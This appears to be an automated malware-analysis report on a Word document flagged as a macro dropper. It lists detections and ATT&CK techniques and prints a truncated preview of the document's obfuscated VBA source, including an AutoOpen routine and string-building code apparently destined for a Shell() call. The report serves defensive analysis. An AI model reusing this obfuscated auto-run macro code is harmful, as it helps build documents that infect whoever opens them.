MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing a VBA macro. The macro includes a Shell() call, which is a critical finding, indicating an attempt to execute arbitrary commands. The presence of the 'AutoOpen' macro and the ClamAV detection name 'Doc.Dropper.Agent-6911940-0' strongly suggest this document is designed to drop and execute a secondary payload. No specific family could be identified, but the technique is consistent with a macro-based downloader.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6911940-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6911940-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 64790 bytes |
SHA-256: f99e35019bdccc06c491f33d774415609ca1b73e4380b5fe8589f0a21793720c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ochBFSTcDoJZ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim zHXiM(1) zHXiM(0) = Right(dzoFMjA + dHdpwvYkpjRRunUAja + nkDBcvra, 884) + Mid(QFOqWDd + XhRLFVAYzNwGLquCdtPpEp + qzwzDb, 462, 472) Dim kXrjbB(2) kXrjbB(0) = MidB(GmLfqVI + oAQJvMVUwCGMZRGXK + PktIwu, 324, 673) + Right(ETAbb + piNHDWiuDFZOlWpWQmkRElE + tujww, 348) + MidB(HKLNOOF + JfaidqvECFMIfdAzWHcw + iLYSBXfa, 876, 533) + Right(TPQqDr + UwoNilOUDjiWRRdDiZlP + OJkjjE, 713) kXrjbB(1) = Mid(VjXLjPJ + puqtbwYZolCtoTbdan + CvWMuFtn, 399, 45) + Right(ziUiQi + wuYnzdXnjzSqzFIESjAQA + uGwtN, 852) Dim WjdqAw(1) WjdqAw(0) = MidB(DPbFJ + bWMaXGHaMzviNjLfPA + hFuSC, 329, 364) + Right(WpwtSS + PZCdBlEpBufEZMfVd + qHzkY, 776) Dim AdwIRE(1) AdwIRE(0) = MidB(uCvjNCc + RPIHSUzIWCiXGQwLuSuAifnb + ikUwWY, 249, 790) + MidB(IAzWinH + ihBNnUjXZbitZthjAiDJb + tTYSvXQ, 611, 872) Dim mOlZn(2) mOlZn(0) = MidB(ZCBvuVkE + bhqhHYNpJbHXvVXpB + jfYcu, 66, 21) + Left(VhXaFIq + TLzMYSitzzNPmFRzfiOMB + ZzjBn, 610) + MidB(hzMXHGzA + oYFvSHzjzKwoStfNoM + PFFFaD, 59, 668) + MidB(LMwzi + upwtpcPioMRoVDqpM + tdQjEnj, 810, 353) mOlZn(1) = Left(puWUbacE + OqQrbWquoUUNwIYNfsWz + iSAcQMIO, 785) + Mid(zpcRtvIa + hZzwREJzstztwEtbLFYS + TvvmzNW, 810, 548) Dim QWZjh(1) QWZjh(0) = Left(wkIDQztL + wiwSoLwKMKsbHvKkNSq + ouwurMN, 554) + Left(vjkwb + hXSlFHbIDivHAMit + Hzzhja, 98) + MidB(ziZCkT + jloSiJiBGnjYShwqSEZiCil + CPKon, 285, 900) + Left(BYnUjmU + whAcMsttJDwFiwivz + XZVoC, 742) WhFmibfSkzrCz (KeyString(vHuSLuzf + XlbIaVFI + 17 + 14 + 36 + VbHKb + JUinl) + zviaD + JUTSM + KeyString(cFSQMFVT + qvrpKaH + 19 + 16 + 42 + YJfniEzH + orPuO) + KlVXQ + AbGUBWd + swhtwGVXiPC + wpbRj + HnfbAzb + NAZAbAjj + NNPYS) Dim ivFzd(1) ivFzd(0) = MidB(NIazC + fWGmGarSqzZzifUGXDXZ + oYjISH, 332, 27) + Right(RLwzw + dOBEVfUaivzRHzXXoizif + SaWhUJ, 539) Dim lXjnzh(1) lXjnzh(0) = Left(judQd + UGhtEfdYwSTuqajhDkoHQTa + FCPZMQtI, 828) + Right(LHwApfN + JKzQvtjzQadSiisHdw + HTWvmnRk, 111) End Sub Attribute VB_Name = "KhKTsOhXdVDIzU" Function KlVXQ() iOozbbjQa = "d \/ /\/\/ \/\ /" + "V:ON/C" + """" + "set" + " `\];=20a7 02a7 70a2" Dim bbPrK(2) bbPrK(0) = Mid(WYKOwzIT + iQmuwzQrNupRLprIomaH + zQDmv, 939, 192) + Mid(DXvQddWa + AhHzYjRLilDIXhpiwQ + UHSDwOi, 350, 239) bbPrK(1) = MidB(PZqRioLf + KzOYdcjvXvPznrmChQZwMH + PKqkk, 735, 156) + MidB(DiTmh + jBzZDZuYcRIlQQRjV + KdrdjDP, 374, 325) + MidB(INLInHq + MHVzYFBNUAPLwiZpUiE + dcpqId, 183, 810) + Right(aDHsE + BQwzPQVlFiBSREVwPLEaL + CVnPpVL, 358) Dim PROiYU(2) PROiYU(0) = Left(boPrTH + HOqwqkiuviWPMqSfnGRrqh + VRKCfLS, 274) + Right(jwibjkd + IPwPDbQQpXoBURjs + zwtXH, 389) + Left(ahNEj + WBGBDvYYcRKPAkjq + EswjaE, 800) + Left(vjujz + rzPvZVvKXELhcUpRJKVd + QOhiP, 947) PROiYU(1) = Right(XtkbPrjw + DAiahaLcjGTWVZHOHuZ + KjkOU, 231) + Right(DwZph + GoEUdtEOBfjcidFSQzqf + zuPXwj, 28) Dim UtWQs(2) UtWQs(0) = Right(nSTSNjBZ + PtCaqkVwDLszVoNJVn + ZCiYum, 832) + Left(BvDCL + dWqlZivVwrunPYjtXHLYjFw + CcTKvQjz, 934) UtWQs(1) = Right(rHNlwuwQ + OKiiVpRHfaaESLdXiZjIamQ + aoIiTOn, 350) + MidB(abOApFW + uaUMzFCiBEwEuTWsGpf + GYwUYuDD, 413, 256) + MidB(FbLpO + QkfVjcViiKNjGYwkij + arvrS, 840, 222) + MidB(iWbDbDPw + VZLzkSUmsdhYEiljJiW + isFdfV, 640, 770) zjArrbkHkD = " 720a 2a07" + " 7a20 20a7 270a" + " 70a2 72a0 a072 a" Dim sacGaP(2) sacGaP(0) = Left(SKzRtzAW + LFhouZumBcIjdvWUZVN + nMQmCzAv, 690) + Left(GPDfCMZ + LKiRfPDinQzmhJHwmAjY + jOsrRNvj, 546) + Left(iwHnvWu + oThCztEqpimsVwmjZUO + XAKAKrim, 523) + MidB(NhptY + snJrpdnkjKWImizjEQ + sLlMk, 357, 412) sacGaP(1) = MidB(RAVXl + jqWGvEwiFuLwDtcQf + YUOqzF, 173, 98) + MidB(wmCNt + QGmifXwWMwbAGQRCr + wpdTsMJ, 726, 819) + Left(MAZRl + EtcsMdqhjmvrBKoHLiznk + bhUboiY, 98) + MidB(zGczd + cwuSzCRUkhSrWaCI + sIXmNz, 771, 35) Dim iThKl(2) iThKl(0) = Mid(bfHKTt + jFIjCzUtkqXflCYiwzZv + HadFLZOj, 996, 648) + Right(RSEOVoa + nqdjuLrnGJCXrs ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.